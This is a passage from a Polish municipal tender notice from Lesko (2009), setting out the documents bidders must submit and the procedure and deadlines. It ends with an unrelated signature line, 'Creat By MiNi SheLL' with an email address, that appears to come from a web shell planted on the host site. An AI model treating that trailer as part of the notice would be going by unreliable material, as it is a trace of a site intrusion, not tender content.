	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast w/w dokumentu, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

c)	wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, według wzoru, stanowiącego załącznik nr 4 do niniejszej siwz. 
	Do wykazu należy dołączyć oświadczenie o spełnianiu wymagań stawianych w siwz wg wzoru stanowiącego załącznik nr 5 do siwz.
W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny wykaz osób, którymi dysponują lub będą dysponować.

d)	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób i podmiotów, Wykonawca wskazał osoby, którymi będzie dysponował, wg wzoru stanowiącego załącznik nr 6 do siwz.

e) 	dokumenty stwierdzające, że osoby, o których mowa w ppkt c), na których przepisy nakładają obowiązek posiadania wymaganych uprawnień (dotyczy Inspektorów Nadzoru) posiadają wymagane uprawnienia tj :
-	uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
-	uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
oraz dokumenty potwierdzające przynależność tych osób do właściwej izby samorządu zawodowego aktualne na dzień składania ofert.

f)	wykaz wykonanych usług podobnych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców według wzoru, stanowiącego załącznik nr 7 do niniejszej siwz oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie (np. referencje).
W przypadku składania oferty wspólnej Wykonawcy składający ofertę wspólną składają jeden wspólny w.w. wykaz.

g)	rachunek zysków i strat zgodnie z ustawą z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2002 r. Nr 76, poz. 694 z późn. zm.)
Wykonawcy nie zobowiązani do sporządzania sprawozdania finansowego przedłożą w celu potwierdzenia swojej kondycji finansowej oświadczenie o obrotach, zyskach, zobowiązaniach i należnościach - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
	W przypadku składania oferty wspólnej oceniana będzie łączna sytuacja ekonomiczną i finansową składających ofertę wspólną..

h)	polisę, a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
W przypadku składania oferty wspólnej w/w dokument składa każdy z Wykonawców składających ofertę wspólną.

Ponadto Wykonawcy mają dołączyć do oferty następujące dokumenty:
a)	ofertę cenową sporządzoną na formularzu oferty, wg wzoru stanowiącego załącznik nr 1 do siwz (zgodnie z Częścią B pkt 1. siwz); 
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
b)	harmonogram rzeczowo-finansowy, wg wzoru stanowiącego załącznik nr 2 do siwz (zgodnie z Częścią B pkt 1. siwz);
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
c)	odpowiednie pełnomocnictwa;
Pełnomocnictwa są wymagane jedynie wówczas, gdy upoważnienie do podpisania oferty nie wynika z innych dokumentów załączonych przez Wykonawcę (Część B pkt 1. 6 siwz) lub w przypadku składania oferty wspólnej (Część B pkt 3. 1 siwz).
d)	propozycje zlecenia robót podwykonawcom wskazujące część zamówienia, której wykonanie Wykonawca powierzy podwykonawcom według wzoru stanowiącego załącznik nr 8, jeżeli Wykonawca przewiduje udział podwykonawców lub oświadczenie, że wszystkie prace objęte zamówieniem zostaną wykonane samodzielnie, gdy Wykonawca nie przewiduje udziału podwykonawców.
Wykonywanie obowiązków: Inżynier Rezydent (szef zespołu) i Menedżera kosztów nie może być powierzone podwykonawcom.
W przypadku składania oferty wspólnej należy złożyć jeden dokument..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.lesko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Lesku
ul. Parkowa 1
38-600 Lesko.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy w Lesku
ul. Parkowa 1
38-600 Lesko
pok. nr 106 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com